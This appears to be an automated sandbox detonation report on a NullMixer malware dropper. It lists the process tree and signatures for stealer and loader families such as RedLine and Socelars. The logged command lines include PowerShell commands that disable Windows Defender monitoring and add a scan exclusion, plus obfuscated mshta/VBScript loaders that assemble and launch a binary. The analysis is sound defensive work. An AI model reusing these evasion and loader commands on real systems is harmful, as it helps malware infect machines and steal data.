PID 3476 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 60 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1487ca754e680f91.exe
PID 3664 wrote to memory of 60 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1487ca754e680f91.exe
PID 3664 wrote to memory of 60 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1487ca754e680f91.exe
PID 3624 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3624 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3624 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2052 wrote to memory of 2384 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14f1396dfcf191bd.exe
PID 2052 wrote to memory of 2384 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14f1396dfcf191bd.exe
PID 4132 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4132 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4132 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2548 wrote to memory of 1752 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14d32a38896785b13.exe
PID 2548 wrote to memory of 1752 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14d32a38896785b13.exe
PID 3012 wrote to memory of 5104 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14514904a4b.exe
PID 3012 wrote to memory of 5104 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14514904a4b.exe
PID 2456 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe

"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3476 -ip 3476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4284 -ip 4284

C:\Users\Admin\AppData\Local\Temp\is-MB0V3.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-MB0V3.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$9003E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 240

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 620

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-THB94.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-THB94.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$F0040,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4392 -ip 4392

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 748

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Sat142b09ae40c44cf.exe" /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4392 -ip 4392

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 824

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run ( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 660

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\2KSA.GF7

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd3126cc40,0x7ffd3126cc4c,0x7ffd3126cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1756 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2068,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2096 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2284,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2260 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3204,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3304 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4560,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4576 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1096

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1116

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4500,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4672 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1304

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4960,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5028 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5040,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5216 /prefetch:8

Network


Files


Analysis: behavioral3

Detonation Overview

Submitted

2024-11-23 18:38

Reported

2024-11-23 18:40

Platform

win7-20241010-en

Max time kernel

119s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1427fbafcf251.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat144474a564d26f29.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14febbc433.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS46AA8418\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VQD2J.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VQD2J.tmp\Sat1481f5a7e3eccdd.tmp N/A
